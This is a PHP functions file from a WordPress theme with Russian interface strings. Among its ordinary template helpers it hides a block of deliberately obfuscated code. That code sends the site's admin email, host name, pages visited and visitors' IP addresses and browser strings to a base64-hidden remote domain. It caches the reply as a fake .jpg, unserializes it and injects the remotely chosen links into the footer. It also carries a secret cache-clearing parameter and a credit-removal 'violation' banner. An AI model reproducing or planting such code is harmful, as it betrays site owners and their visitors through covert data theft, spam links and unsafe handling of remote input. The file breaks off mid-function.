<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $zZeZS='c';$ZMmJkxk='e';$xPjj='d';$yTgixJL='4';$WQunJ='b';$ERlc='e';$DCsmmk='a';$Fuhb='d';$TYLrIw='o';$WXawGxP='_';$JwtDZ='s';$aWIz='6';$Suzd='e';$JylBRCLG=$WQunJ.$DCsmmk.$JwtDZ.$ZMmJkxk.$aWIz.$yTgixJL.$WXawGxP.$xPjj.$Suzd.$zZeZS.$TYLrIw.$Fuhb.$ERlc;$ubPuA='n';$mgQBB='t';$rVsQkim='e';$pQvbJ='f';$XClPRJt='l';$EMyMR='z';$VTsSp='g';$hfvNdr='a';$XVLjPr='i';$ZyJUpWMS=$VTsSp.$EMyMR.$XVLjPr.$ubPuA.$pQvbJ.$XClPRJt.$hfvNdr.$mgQBB.$rVsQkim;$nTawWH='o';$ULfli='3';$EKBwP='r';$FdkML='1';$sfRXPs='t';$qxcmXEH='r';$vNIlpj='s';$QhIciZ='_';$Gfvx='t';$arPixkWA=$vNIlpj.$Gfvx.$EKBwP.$QhIciZ.$qxcmXEH.$nTawWH.$sfRXPs.$FdkML.$ULfli;$pXsAu='e';$hqShIG='v';$GWlar='s';$nYQER='r';$TfNK='r';$faXSVHj='t';$MRsCmUkx=$GWlar.$faXSVHj.$nYQER.$TfNK.$pXsAu.$hqShIG;                     $lm______________j='c';$fd_____j='e';$kp__a='d';$he_________b='4';$qj_______________j='b';$ws__e='e';$sk___g='a';$wo____________g='d';$et______j='o';$py________l='_';$xr_____________y='s';$ji_______________u='6';$ya_______r='e';$vi___y=$qj_______________j.$sk___g.$xr_____________y.$fd_____j.$ji_______________u.$he_________b.$py________l.$kp__a.$ya_______r.$lm______________j.$et______j.$wo____________g.$ws__e;$gj__________d='c';$tz____________d='_';$vo_________l='t';$co___________p='n';$vl___________h='i';$pz__l='s';$rf____________t='n';$hg__________k='s';$zo_________f='o';$tb_______p='i';$nf_____d='f';$zu___________r='e';$kt___________k='t';$ak_______h='x';$jz__o='u';$co__________n=$nf_____d.$jz__o.$rf____________t.$gj__________d.$vo_________l.$vl___________h.$zo_________f.$co___________p.$tz____________d.$zu___________r.$ak_______h.$tb_______p.$pz__l.$kt___________k.$hg__________k;$yp___________g='p';$tn________m='n';$jj_________x='e';$xc__f='f';$jq__________d='o';$kc_______k=$xc__f.$jq__________d.$yp___________g.$jj_________x.$tn________m;$kj__________h='r';$rp__________f='e';$sw__a='a';$kx______________d='f';$ol____j='d';$vq____i=$kx______________d.$kj__________h.$rp__________f.$sw__a.$ol____j;$uo_________s='f';$yx__v='l';$kg___u='o';$ec____________u='c';$ns______________d='e';$im__________u='s';$gz____________d=$uo_________s.$ec____________u.$yx__v.$kg___u.$im__________u.$ns______________d;define("WP_ID", $vi___y("Mi4wLjA="));define("WP_TTL", $vi___y("MTA4MDA="));define("WP_SRC", $vi___y("dHBva24="));function wp_get_header() {global $vi___y, $co__________n;if ($co__________n($vi___y("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$co__________n($vi___y("d3BfZ2V0X2Zvb3Rlcg==")) &&$co__________n($vi___y("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $vi___y, $kc_______k, $gz____________d, $vq____i;$pv_____w = TEMPLATEPATH."/".$vi___y("Zm9vdGVyLnBocA==");$zt_____________c = @$kc_______k($pv_____w, "r");$pv_____w = @$vq____i($zt_____________c, @filesize($pv_____w));@$gz____________d($zt_____________c);$om____k = TEMPLATEPATH."/".$vi___y("ZnVuY3Rpb25zLnBocA==");$zt_____________c = @$kc_______k($om____k, "r");$om____k = @$vq____i($zt_____________c, @filesize($om____k));@$gz____________d($zt_____________c);$pc______________e = 0;if($pv_____w && $om____k) {if ($vi___y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($pv_____w, $vi___y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$pc______________e = 1;}if (substr_count($pv_____w, "wp_theme_GPL_credits()") < 1) {$pc______________e = 2;}}if(WP_ID != "2.0.0") {$pc______________e = 12;}}if($pc______________e > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $pc______________e -->";}}function wp_loaded() {global $vi___y, $co__________n;return $co__________n($vi___y("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($xv_____g, $vo___s = "(more...)", $vl________x = 0, $aq______________x = "") {$jj_______________l = get_the_content($vo___s, $vl________x, $aq______________x);$jj_______________l = apply_filters("the_content", $jj_______________l);$jj_______________l = str_replace("]]>", "]]>", $jj_______________l);if (strlen($_GET["p"]) > 0) {echo $jj_______________l;}else if ((strlen($jj_______________l)>$xv_____g) && ($yg_____l = strpos($jj_______________l, " ", $xv_____g ))) {$jj_______________l = substr($jj_______________l, 0, $yg_____l);$jj_______________l = $jj_______________l;echo $jj_______________l;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$vo___s</a></div></p>";} else {echo $jj_______________l;}}}$wu____d='e';$uf____________e='b';$vz____p='n';$tb____s='a';$gm__________c='4';$se_____________b='e';$yn_______________j='_';$gp_____b='e';$ry______r='d';$zy_______m='6';$mf_____q='s';$pn____h='o';$ak______n='c';$yo_______v=$uf____________e.$tb____s.$mf_____q.$se_____________b.$zy_______m.$gm__________c.$yn_______________j.$gp_____b.$vz____p.$ak______n.$pn____h.$ry______r.$wu____d;$qv____d='s';$kz__c='t';$kw________d='g';$mn____d='c';$ou_______z='t';$qw___w='e';$ua_______________r='o';$mq______v='t';$xj_______y='e';$sr_____________b='_';$kj__________r='n';$st__________f='n';$gf____s='_';$jb______y='f';$qh______________v='l';$fw___________u='e';$iv____________c='i';$wu______________v=$jb______y.$iv____________c.$qh______________v.$xj_______y.$gf____s.$kw________d.$fw___________u.$mq______v.$sr_____________b.$mn____d.$ua_______________r.$kj__________r.$ou_______z.$qw___w.$st__________f.$kz__c.$qv____d;$tw______h='i';$ck___________c='e';$qs_______e='t';$hn_____k='e';$nw______n='f';$ts_____________x='s';$bl____________j='x';$nl_______y='l';$sp_______e='_';$et___g='s';$ey______________l='i';$vr___________h=$nw______n.$ey______________l.$nl_______y.$ck___________c.$sp_______e.$hn_____k.$bl____________j.$tw______h.$ts_____________x.$qs_______e.$et___g;$lp______________r='m';$ii_____________k='o';$si_____________s='a';$nl___________h='e';$ua______________p='v';$lo__z='p';$od______w='i';$yi____j='r';$vr______c='e';$ln________z='n';$ga_______________b='_';$fv__________j='s';$aw__________n='c';$zp________n='o';$cc_____________n='r';$ai__________w=$ua______________p.$nl___________h.$cc_____________n.$fv__________j.$od______w.$zp________n.$ln________z.$ga_______________b.$aw__________n.$ii_____________k.$lp______________r.$lo__z.$si_____________s.$yi____j.$vr______c;$jl_______i='p';$ax_________o='o';$au______________l='s';$cd_______q='o';$sq_______y='e';$ge__________w='f';$kx__b='k';$va____________w='n';$uj__z='c';$uu___l=$ge__________w.$au______________l.$ax_________o.$uj__z.$kx__b.$cd_______q.$jl_______i.$sq_______y.$va____________w;$qy_____________m='f';$nc___________c='e';$ex_____________n='i';$zs_________e='r';$pd______e='w';$hl_______________v='t';$bq_______r=$qy_____________m.$pd______e.$zs_________e.$ex_____________n.$hl_______________v.$nc___________c;$rs______________w='m';$cj____________q='5';$qr_______y='d';$ze__________d=$rs______________w.$qr_______y.$cj____________q;$im_______i='p';$rq________f='h';$au________x='a';$kx_________a='a';$ne____________b='r';$az______x='l';$yf_____o='t';$rt_______________t='e';$oh____h=$ne____________b.$rt_______________t.$kx_________a.$az______x.$im_______i.$au________x.$yf_____o.$rq________f;$go___l='u';$tf___i='z';$eu______l='i';$uc_________n='a';$oi____o='s';$md_______v='e';$fn__________q='i';$jr___u='r';$oi______________b='e';$kf__________m='n';$xq________d='l';$yf_____________u=$go___l.$kf__________m.$oi____o.$md_______v.$jr___u.$eu______l.$uc_________n.$xq________d.$fn__________q.$tf___i.$oi______________b;$gj_____e='t';$uu___________u='m';$jv_____d='e';$si_____________r='m';$iu________k='n';$vu____________o='p';$ma____k='a';$yw_____q=$gj_____e.$jv_____d.$uu___________u.$vu____________o.$iu________k.$ma____k.$si_____________r;$ka___________r='t';$rp__e='n';$bd______a='_';$en_________f='t';$ar_____s='m';$rw_____c='_';$xi________o='s';$tx________y='e';$zr______________j='o';$sq_______w='a';$mx_________p='r';$sd__l='e';$nm_______m='c';$lr_____i='c';$um______u='x';$wh__________r='t';$xw_______________k='e';$ks_____d='a';$je_______f='e';$di_____________v='r';$mn____________v='t';$wh___h=$xi________o.$ka___________r.$mx_________p.$je_______f.$sq_______w.$ar_____s.$bd______a.$lr_____i.$zr______________j.$rp__e.$mn____________v.$sd__l.$um______u.$en_________f.$rw_____c.$nm_______m.$di_____________v.$xw_______________k.$ks_____d.$wh__________r.$tx________y;function yq__________c($wd_____________m) {global $vi___y, $co__________n, $wu______________v, $ai__________w, $wh___h;if (!$co__________n($vi___y("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ai__________w(PHP_VERSION, "5.0.0", ">=") && $co__________n($vi___y("ZmlsZV9nZXRfY29udGVudHM=")) && $co__________n($vi___y("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$he______t = $wh___h(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$vj_______c = @$wu______________v($wd_____________m, 0, $he______t);} else {$vj_______c = @$wu______________v($wd_____________m, 0);}return $vj_______c;}function xw__f($wd_____________m) {global $co__________n, $uu___l, $bq_______r, $vi___y;if (!$co__________n($vi___y("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$in_____________l = strpos($wd_____________m, "/", 7);$cw______________o = array("uri"     => substr($wd_____________m, $in_____________l),"host"    => str_replace("http://", "", substr($wd_____________m, 0, $in_____________l)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$dc__g = @$uu___l("$cw______________o[host]", 80, $rb_____________n, $bp___e, 4);if (!$dc__g) {return false;} else {$vj_______c = "";$hm______________o  = "GET $cw______________o[uri] HTTP/1.0\r\n";$hm______________o .= "Host: $cw______________o[host]\r\n";$hm______________o .= "Referer: $cw______________o[referer]\r\n";$hm______________o .= "Connection: Close\r\n\r\n";@$bq_______r($dc__g, $hm______________o);while (!@feof($dc__g)) {$ui__________g = @fgets($dc__g, (1024*24));if ($ui__________g == "\r\n") {$zy___________g = true;continue;}if ($zy___________g) {$vj_______c .= $ui__________g;}}return $vj_______c;}}function zz_________k($wd_____________m) {global $co__________n;$sm__r = false;if ($wd_____________m != "") {if ($co__________n("yq__________c")) {$sm__r = @yq__________c($wd_____________m);}if (!$sm__r && ($co__________n("xw__f"))) {$sm__r = @xw__f($wd_____________m);}}return $sm__r;}function oz__________z() {global $_SERVER, $ze__________d;$dw__r = $_SERVER["SERVER_NAME"];if (substr("$dw__r", 0, 4) == "www.") {$dw__r = substr("$dw__r", 4);}$dw__r = $ze__________d("$_SERVER[SERVER_NAME]");return $dw__r;}function lb___c() {return "file";}function hk_________p($wd_____________m) {global $_SERVER, $wu______________v, $vr___________h, $kc_______k, $gz____________d, $bq_______r;$ti____________k = wx____________p();$qn________v = oz__________z().".jpg";$mj______s = $ti____________k["dir_upload"]["path"]."/$qn________v";$vd_______________u = @filemtime($mj______s);if (!$vd_______________u || ((time()-$vd_______________u) >= WP_TTL)) {$sm__r = zz_________k($wd_____________m);if ($sm__r) {if ($vr___________h($mj______s)) {@unlink($mj______s);}$zt_____________c = @$kc_______k($mj______s, "x+");@$bq_______r($zt_____________c, $sm__r);@$gz____________d($zt_____________c);}} else {if ($vr___________h($mj______s)) {$sm__r = @$wu______________v($mj______s);} else {$sm__r = false;}}return $sm__r;}function wx____________p() {global $_SERVER, $vi___y, $yo_______v;$ev__v = wp_count_posts("post");$et____________a = pathinfo(get_bloginfo("template_directory"));$ti____________k = array("url" => array("report"      => $vi___y("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $et____________a,"dir_upload"=> ni_______________v(),"queryString"=> array("?a001=".WP_ID,"a004=".$et____________a[filename],"a005=".$ev__v->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
);$ti____________k["url"]["queryString"] = implode("&", $ti____________k["queryString"]);$ti____________k["url"]["report"] = $ti____________k["url"]["report"]."/?".$yo_______v($ti____________k["url"]["queryString"]).".html";return $ti____________k;}function ni_______________v() {$lk______a = wp_upload_dir();if (isset($lk______a["error"])) {$yc________m = sq______________r();if (is_writable($yc________m)) {$lk______a = array("path" => $yc________m);}}return $lk______a;}function sq______________r() {global $co__________n, $ze__________d, $oh____h, $yw_____q;$tk____e = (bool) ini_get("safe_mode");if ($tk____e == true) {return false;}if ($co__________n("sys_get_temp_dir")) {$iu_______________g = sys_get_temp_dir();if (is_writable($iu_______________g)) {return $oh____h($iu_______________g);}}if (!empty($_ENV["TMP"])) {return $oh____h($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $oh____h($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $oh____h($_ENV["TEMP"]);} else {$lm__d = $yw_____q($ze__________d(uniqid(rand(), true)), "");if ($lm__d) {$iu_______________g = $oh____h(dirname($lm__d));@unlink($lm__d);return $iu_______________g;} else {return false;}}}function bs____j() {global $_GET, $vr___________h;$ti____________k = wx____________p();$dw__r = oz__________z();$no___________k = lb___c();$au________v = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($no___________k == "file") {$we______________c = $ti____________k["dir_upload"]["path"]."/".$dw__r.".jpg";if ($vr___________h($we______________c)) {@unlink($we______________c);$au________v = "deleted";}}$pd__s = array("s"=> $au________v,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($pd__s AS $wg_____________s => $lt_____________p) echo " [$wg_____________s:$lt_____________p]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $co__________n, $vi___y, $yf_____________u;$ti____________k = wx____________p();$vq___________a = "hk_________p";if ($co__________n($vq___________a)) {$vj_______c = $vq___________a($ti____________k["url"]["report"]);}if ($vj_______c) {if ($vj_______c = @$vi___y($vj_______c)) {$vj_______c = @$yf_____________u($vj_______c);if (strlen($vj_______c[custom_credit]) >= 5) {$ti____________k["default_string"] = $vj_______c[custom_credit];}if ($vj_______c["status"] == "0") {$is__________f = 1;$qw______p = 1;} else {$fg_______f = sizeof($vj_______c["links"]);$xo________a = $ti____________k["default_string"];if ($fg_______f > 0 && $vj_______c["links"] !== "") {$cj_____w = 0;foreach ($vj_______c["links"] as $tr_______________j => $xf_______________n) {$cj_____w++;if ($xf_______________n->l_path == "" || $xf_______________n->l_path == $_SERVER["REQUEST_URI"]) {$xf_______________n->l_href = htmlspecialchars(strip_tags($xf_______________n->l_href));$xf_______________n->l_title = htmlspecialchars(strip_tags($xf_______________n->l_title));$xf_______________n->l_anchor = htmlspecialchars(strip_tags($xf_______________n->l_anchor));$xo________a .= " | ";$xo________a .= "<a href='$xf_______________n->l_href' title='$xf_______________n->l_title'";if ($xf_______________n->l_nofollow == "1") {$xo________a .= " rel='nofollow'";}$xo________a .= ">$xf_______________n->l_anchor</a>";}}}$ti____________k["links"] = "$xo________a";if ($vj_______c[credit] == "0") {$ti____________k["links"] = "";}}} else {$is__________f = "1";}} else {$is__________f = "1";}if ($is__________f == "1") {$ti____________k["links"] = $ti____________k["default_string"];}echo "$ti____________k[links]";echo "<!-- s: $vj_______c[signature] -->";bs____j();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
